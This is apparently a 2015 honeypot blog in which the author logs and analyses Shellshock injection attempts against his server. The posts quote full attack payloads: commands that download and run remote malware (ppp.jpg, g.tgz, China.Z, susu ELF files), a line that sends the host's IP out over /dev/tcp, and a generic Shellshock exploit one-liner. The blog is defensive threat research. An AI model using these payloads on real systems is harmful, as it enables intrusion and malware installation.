Samstag, 25. April 2015

perl script injection again

The same style as reported some days ago has hit the system again last night

 186.56.42.11 - - [25/Apr/2015:09:11:48 +0200] "GET /cgi-sys/entropysearch.cgi HTTP/1.1" 404 477 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget http//luxsocks.ru ; wget https://luxsocks.ru --no-check-certificate ; curl http//luxsocks.ru// ; curl -k https://luxsocks.ru ; lwp-download http://luxsocks.ru ; GET http://luxsocks.ru ; lynx http://luxsocks.ru ; wget http://174.122.42.230/luxx ; curl http://174.122.42.230/luxx ; fetch http://174.122.42.230/luxx ; lwp-download http://174.122.42.230/luxx ; GET http://174.122.42.230/luxx ; lynx http://174.122.42.230/luxx\");'"
By using the commands above ( wget https://luxsocks.ru --no-check-certificate) it seems that the idea behind this attack was to download and replace the index.html page. So just for the record, if you have a index.html page already within the download directory, wget will simple put a index.html.1 page there. When you only have a index.php, this attack maybe could work, but seems to be odd.

The system was again hit for 30 times within a short time range. So even it would worked, it would result in 30 index.html files.

When testing the link against virustotal, there was no result

Donnerstag, 23. April 2015

Injection of perl script [UPDATE]

Tonight my system was hit 29 times by these requests

94.136.36.227 - - [23/Apr/2015:21:36:02 +0200] "GET /phppath/cgi_wrapper HTTP/1.1" 404 474 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget http://88.198.96.10/wget ; curl http://88.198.96.10/curl ; fetch http://88.198.96.10/fetch ; lwp-download http://88.198.96.10/lwp-download ; GET http://88.198.96.10/GET ; lynx http://88.198.96.10/lynx \");'"
 By trying the commands manually I was not able to fetch any data, so a deeper analyze of what happend or should been happen was just not possible.

When testing the link against virustotal, there was no result

The origin server is hosted in Germany.

Dienstag, 21. April 2015

Shellcode injection revisited

If you have followed this blog and read the other posts, you can see that the attacks which could do the most harm and are coming again and again are shellcode injections.

Good point to revisit this attack.


Shell code injection is based on a vulnerability within BASH. This shell variant is the widest used on all linux and unix based opationsystem, many of them ship them as default. Now, this bug exists for years and was never used, maybe cause nobody even now of its exsistens.

In September 2014 this bug was found and the legend of this vulnerability started

http://en.wikipedia.org/wiki/Shellshock_%28software_bug%29

Today, every version of the bash has a fix. Only problem is that many people out there are using quite old systems which will not receive security updates by default. Good news, and maybe many just do not know, within most linux operating systems you are able to replace the bash (ex. with zsh, tcsh or others) or you are able to use some ongoing "Long Term Support" repositories like debian just released for squeeze

https://wiki.debian.org/LTS/Using

Another idea would be to just compile your own version and install it from source

https://www.gnu.org/software/bash/

So, now this bug is more than half a year old, why do we still see this many attacks in the wild?

The answer is sad and easy at the same time.
This vulnerability is so easy to use!

env X='() { (a)=>\' bash -c "echo date"; cat echo
is all you need to exploit it. While you can replace the "echo date"; cat echo with simply every command you want to have, like wget or curl, chaning permissions, deleteing the harddisk.



Sonntag, 19. April 2015

Apache CONNECT

Since the starting of the honeypot I have seeen many "CONNECT <url>" entrys within the access.log file. Now, after doing a bit of investigation, these commands belongs to mod_proxy and can be used to force a GET of the url via your server if the mod_proxy module is used.

http://httpd.apache.org/docs/2.2/mod/mod_proxy_connect.html

Beloved targets according to my log files are:
126mx00.mxmail.netease.com:25
126mx01.mxmail.netease.com:25
126mx02.mxmail.netease.com:25
163mx00.mxmail.netease.com:25
163mx01.mxmail.netease.com:25
developer.apple.com:443
mx-tw.mail.gm0.yahoodns.net:25
vip163mx00.mxmail.netease.com:25
vip163mx01.mxmail.netease.com:25
www.alipay.com:443
www.microsoftstore.com.cn:443
 According to the link above, you should run mod_proxy only if your system is hardened.

Samstag, 18. April 2015

susu1 and susu2 ELF files via php injection

Today several code injection attempts had hit my Honeypot.

188.138.40.254 - - [18/Apr/2015:05:37:08 +0200] "GET /dana-na/auth/url_default/welcome.cgi HTTP/1.0" 404 523 "() { :;} ;echo;/usr/local/bin/php -r '$a = \"http://x5d.su/s/susu1\";''$b = \"http://x5d.su/s/susu2\";''$c = sys_get_temp_dir();''$d = \"susu1\";''$e = \"susu2\";''$f = \"chmod 777\";''$g = \"file_put_contents\";''$h = \"system\";''$i = \"file_exists\";''$j = \"fopen\";''if ($i($c . \"/$d\"))''{''exit(1);''}else{''echo($c);''$g(\"$c/$d\", $j(\"$a\", \"r\"));''$g(\"$c/$e\", $j(\"$b\", \"r\"));''$h(\"$f \" . $c .\"/$d\");''$h(\"$f \" . $c .\"/$e\");''$h($c . \"/$d\");''$h($c . \"/$e\");''}'" "-"
The two different files are used to determine which architecture the server has

 susu1:     file format elf64-x86-64
susu1
architecture: i386:x86-64, flags 0x00000102:
EXEC_P, D_PAGED
start address 0x0000000000103cc0

Program Header:
    LOAD off    0x0000000000000000 vaddr 0x0000000000100000 paddr 0x0000000000100000 align 2**20
         filesz 0x0000000000004494 memsz 0x0000000000004494 flags r-x
    LOAD off    0x0000000000009be0 vaddr 0x0000000000509be0 paddr 0x0000000000509be0 align 2**20
         filesz 0x0000000000000000 memsz 0x0000000000000000 flags rw-

Sections:
Idx Name          Size      VMA               LMA               File off  Algn
SYMBOL TABLE:
no symbols
 and

susu2:     file format elf32-i386
susu2
architecture: i386, flags 0x00000102:
EXEC_P, D_PAGED
start address 0x00c03e50

Program Header:
    LOAD off    0x00000000 vaddr 0x00c01000 paddr 0x00c01000 align 2**12
         filesz 0x00003631 memsz 0x00003631 flags r-x
    LOAD off    0x00000d30 vaddr 0x0804fd30 paddr 0x0804fd30 align 2**12
         filesz 0x00000000 memsz 0x00000000 flags rw-

Sections:
Idx Name          Size      VMA       LMA       File off  Algn
SYMBOL TABLE:
no symbols

Clamav hashes (md5 and sha256)
  •  5bc85adb6368be6a5321238377802ffd:18248:susu1
  • 381ea0197f00afe0d8e26bb48b71254b:14492:susu2
  • 5e3b5056f9be5490a4332c1cc429b7d2ab12385909586bf297d145ff7d5a34af:14492:susu2
  • 3a4f90405832615a5dbe59c64e6de50c2a1a3e9b372a8605daf60960d4bef016:18248:susu1
I saw 56 attempts coming from the same source  188.138.40.254 origin country is Germany


Freitag, 17. April 2015

Wireshark via remote

From time to time I like to gain a overview on what happens within the network of my virtual server. As I am a huge fan of Wireshark, this is my weapon of choice to do so.

A long time ago I started this investigations by creating a dumpfile on the remote host and copy them to my local machine.

But, that is really not the best way to do, so I want to share this litte shell command

ssh <username>@<remote_host> sudo tcpdump -s0 -w -  | wireshark -k -i -
 If you use Windows and Cygwin the Wireshark call would look like
 /cygdrive/c/Program\ Files/Wireshark/Wireshark.exe -k -i -
 
This leads to execution of the tcpdump on the remote host and the analyze via Wireshark on your local machine.

normally I use some options, as I want to reduce the traffic which is going through the wire. Of course you could filter within Wireshark, but why using so much bandwith

 sudo tcpdump -s0 -w - 'not port 22 and host <host> and not DNS'

  • not port 22: Well as my traffic is coing from port 22 also, it might be a good idea to not take a look
  • host <host>: I do not want to see all traffic in the network, only the traffic related to my own server
  • not DNS: Just an example, many tools (like Apache, MySQL, ClamAV) are performing DNS lookups, I do not want to see them
 There are some steps you should take before you can use the statement above
  • create an ssh key so you can login without password
  • add the user to the sudoers file, best with NOPASSWD option

Donnerstag, 16. April 2015

Mid-Month Report April 2015

This is the monthly review of my Honeypot for April 2015. It is based on data taken from Apache log files. The tool used to optimize the data is mypyfwa.py which is part of the MyPythonApacheFirewall, a project I started on github some time ago.


In the current state, the analyze script extracts requests based on four different types
  • PATH: this describes the usage of more than three „/“ in the request
  • SCANNER: describes that one of the blacklisted scanners is used (Zeus, masscan, etc)
  • SHELLinjection: describes that wget or curl was used within the query
  • SQLinjection: describes that a string including SQL syntax was use
 

Attacker by Countrycode

Mittwoch, 15. April 2015

ppp.jpg (perl based malware) Addbot

On the 07th of April a shellcode injection attempt hit my system.
Target was to download and execute perl based malware.
46.4.73.171 - - [07/Apr/2015:03:54:15 +0200] "GET / HTTP/1.1" 404 442 "() { :;}; /bin/bash -c \"echo 109.234.106.8/ ;cd /tmp;curl -sO http://210.1.61.133/~leelawadee/model/code/ppp.jpg;wget -q http://210.1.61.133/~leelawadee/model/code/ppp.jpg;perl ppp.jpg;rm -fr ppp.jpg; echo 109.234.106.8/ ;cd /var/spool/samba; curl -sO http://210.1.61.133/~leelawadee/model/code/ppp.jpg;wget -q http://210.1.61.133/~leelawadee/model/code/ppp.jpg;perl ppp.jpg;rm -fr ppp.jpg\"" "() { :;}; /bin/bash -c \"echo 109.234.106.8/ ;cd /tmp;curl -sO http://210.1.61.133/~leelawadee/model/code/ppp.jpg;wget -q http://210.1.61.133/~leelawadee/model/code/ppp.jpg;perl ppp.jpg;rm -fr ppp.jpg; echo 109.234.106.8/ ;cd /var/spool/samba; curl -sO http://210.1.61.133/~leelawadee/model/code/ppp.jpg;wget -q http://210.1.61.133/~leelawadee/model/code/ppp.jpg;perl ppp.jpg;rm -fr ppp.jpg\""
The ppp.jpg file is actually a perl script.
Driven by my basic knowledge on perl I would assume that it is a irc controlled bot used to access google and other search engines to ensure a better page ranking.

For more details please visit Virustotal

Unknown pm malware (Samba related)

On the 13th of April a shellcode injection attempt hit my system. target was to download and run Samba related malware.

46.4.73.171 - - [13/Apr/2015:06:04:07 +0200] "GET / HTTP/1.1" 404 442 "() { :;}; /bin/bash -c \"echo ;cd /var/tmp;curl -sO 68.178.173.183/g.tgz;wget -q 68.178.173.183/g.tgz;tar xvf g.tgz;rm -fr g.tgz*;cd z;sh a;cat ip > /dev/tcp/62.149.164.193/21 echo ;cd /var/spool/samba;curl -sO 68.178.173.183/g.tgz;wget -q 68.178.173.183/g.tgz;tar xvf g.tgz;rm -fr g.tgz*;cd z;sh a;cat ip > /dev/tcp/62.149.164.193/21\"" "() { :;}; /bin/bash -c \"echo ;cd /var/tmp;curl -sO 68.178.173.183/g.tgz;wget -q 68.178.173.183/g.tgz;tar xvf g.tgz;rm -fr g.tgz*;cd z;sh a;cat ip > /dev/tcp/62.149.164.193/21 echo ;cd /var/spool/samba;curl -sO 68.178.173.183/g.tgz;wget -q 68.178.173.183/g.tgz;tar xvf g.tgz;rm -fr g.tgz*;cd z;sh a;cat ip > /dev/tcp/62.149.164.193/21\""
The g.tgz includes a directory with two files:
  • pm: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.2.5, stripped
  • a : a iptables script file
/sbin/ifconfig |grep inet |grep -v inet6 |grep -v 127.0.0.1 |tr ':' ' ' |awk '{print $3}' >> ip
chmod +x pm
for i in `cat ip`
do
./pm -i"$i" -e"$i" -p3838 -d
done
/sbin/iptables -I OUTPUT -p tcp --dport 25 -j ACCEPT >/dev/null 2>&1
/sbin/iptables -I INPUT -p tcp --dport 25 -j ACCEPT >/dev/null 2>&1
/sbin/iptables -I OUTPUT -p tcp --dport 3838 -j ACCEPT >/dev/null 2>&1
/sbin/iptables -I INPUT -p tcp --dport 3838 -j ACCEPT >/dev/null 2>&1
/sbin/iptables -I OUTPUT -p tcp --dport 587 -j ACCEPT >/dev/null 2>&1
/sbin/iptables -I INPUT -p tcp --dport 587 -j ACCEPT >/dev/null 2>&1

/sbin/iptables-save

For further details please visit Virustotal

China.Z malware

On the 12th of April my Honeypot server received an attempt of a shellinjection attack.
Taret was to download and run the China.Z malware.

27.17.5.140 - - [12/Apr/2015:14:10:20 +0200] "GET / HTTP/1.1" 404 442 "() { :; }; /bin/bash -c \"rm -rf /tmp/*;echo wget http://61.160.212.172:911/java -O /tmp/China.Z-wxvm >> /tmp/Run.sh;echo echo By China.Z >> /tmp/Run.sh;echo chmod 777 /tmp/China.Z-wxvm >> /tmp/Run.sh;echo /tmp/China.Z-wxvm >> /tmp/Run.sh;echo rm -rf /tmp/Run.sh >> /tmp/Run.sh;chmod 777 /tmp/Run.sh;/tmp/Run.sh\"" "() { :; }; /bin/bash -c \"rm -rf /tmp/*;echo wget http://61.160.212.172:911/java -O /tmp/China.Z-wxvm >> /tmp/Run.sh;echo echo By China.Z >> /tmp/Run.sh;echo chmod 777 /tmp/China.Z-wxvm >> /tmp/Run.sh;echo /tmp/China.Z-wxvm >> /tmp/Run.sh;echo rm -rf /tmp/Run.sh >> /tmp/Run.sh;chmod 777 /tmp/Run.sh;/tmp/Run.sh\""
Today, the malware was not available for download anymore, so if you need additional information please go to Virustotal

 The source address for this IP is located in China.